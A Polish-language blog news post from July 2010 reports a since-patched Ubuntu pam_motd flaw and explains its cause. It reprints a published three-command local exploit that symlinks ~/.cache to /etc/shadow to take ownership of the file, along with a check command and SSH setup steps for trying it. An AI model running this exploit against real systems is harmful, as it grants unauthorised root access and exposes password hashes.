Bądź: Wyszukaj na stronie z użyciem Google
reklama:

piątek, 9 lipca 2010

Ubuntu łata poważną lukę w module PAM

Autor: , 09:14, piątek, 9 lipca 2010


Poważna luka w bezpieczeństwie Ubuntu już załatana.
Ostatnio na jaw wyszła bardzo istotna luka w zabezpieczeniach Ubuntu. Dotyczyła ona modułu pam_motd (message of the day) wyświetlającego w normalnych warunkach informację o poprawnym zalogowaniu do powłoki tekstowej. Wystarczyły trzy proste polecenia by zwiększyć uprawnienia ze standardowego użytkownika do roota.

Na początek należy jednak zaznaczyć, iż powstała już odpowiednia łata, którą można zainstalować pobierając najnowsze aktualizacjeProblem dotyczy wyłącznie Ubuntu i opartych o ten system dystrybucji takich jak Linux Mint. Użytkownicy innych Linuksów mogą tym razem odetchnąć.

Problem w bezpieczeństwie wynikał z faktu przechowywania pliku motd.legal-notice w pamięci podręcznej po zalogowaniu przez PAM pam_motd. Sam moduł sprawdzał, czy zostały wyświetlone informacje na temat licencji, co odbywało się z uprawnieniami użytkownika root i tu pojawiała się furtka, która poprzez wykorzystanie dowiązania symbolicznego pozwalała na zalogowanie się w systemie z uprawnieniami administratora.

Wykorzystanie luki w praktyce - Ubuntu 10.04
Jeden z pierwszych scenariuszy ataku opublikował na swoim Twitterze doktor Jon Oberheide z Uniwersytetu Michigan:

rm -rf ~/.cache
ln -s /etc/shadow ~/.cache
ssh localhost

Dodatkowo po wykonaniu ataku można sprawdzić jego powodzenie poleceniem:

ls -al /etc/shadow
Wskaże nam ono nowego właściciela pliku.

Aby wykorzystać lukę powyższą metodą, niezbędny jest oczywiście uruchomiony demon SSH. W najnowszej wersji desktopowej Ubuntu 10.04, SSH trzeba zainstalować samemu, zatem jeśli ktoś chce się pobawić, najpierw należy wykonać poniższe polecenia:

sudo apt-get install ssh
sudo /etc/init.d/ssh start

Jak widać już nie pierwszy raz, żaden system operacyjny nie jest idealny. Całe szczęście, że dostępne są już poprawki, jednak luka była obecna w Ubuntu od bardzo dawna i niewykluczone, że mogła być wcześniej wykorzystywana do ataków.

[źródła: niebezpiecznik.pl, heise-online.pl, ubuntu.com, twitter.com; info przysłał też vViktor - dzięki!]
blog comments powered by Disqus

Prześlij komentarz


Popularne posty

Etykiety